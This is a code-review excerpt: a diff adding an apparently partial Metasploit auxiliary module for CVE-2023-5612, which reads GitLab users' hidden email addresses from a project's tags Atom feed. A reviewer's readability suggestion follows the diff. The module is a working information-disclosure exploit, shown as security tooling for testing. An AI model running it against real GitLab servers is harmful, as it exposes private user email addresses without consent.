modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb

```diff
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GitLab Tags RSS feed email disclosure',
+        'Description' => %q{
+          An issue has been discovered in GitLab affecting all versions
+          before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1.
+          It is possible to read the user email address via tags feed
+          although the visibility in the user profile has been disabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'n00bhaxor', # msf module
+          'erruquill' # HackerOne Bug Bounty, analysis
+        ],
+        'References' => [
+          [ 'URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/428441' ],
+          [ 'URL', 'https://hackerone.com/reports/2208790'],
+          [ 'CVE', '2023-5612']
+        ],
+        'DisclosureDate' => '2024-01-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the GitLab Application', '/']),
+        OptString.new('TARGETPROJECT', [ false, 'Workspace and project to target', nil])
+      ]
+    )
+  end
+
+  def get_contents(tags)
+    print_status('Check RSS tags feed for: ' + tags)
+
+    # Tag needs to be lower case, so...
+    tags = tags.split('/')[0] + '/' + tags.split('/')[1].downcase
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, tags, '-', 'tags'),
+      'method' => 'GET', 'vars_get' => { 'format' => 'atom' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200 || res.code == 301
+
+    xml_res = res.get_xml_document
+
+    # Check to see if there are any tags with authors
+    author_element = 'author'
+    not_found = xml_res.xpath("//xmlns:#{author_element}").empty?
+    if not_found
+      print_bad('No tags or authors found')
```

Comment:
We can make this a little easier to read:
```
if not_found
  vprint_bad('No tags or authors found')
  return
end
```

now we can get rid of the else (and end), and un-indent 1 level.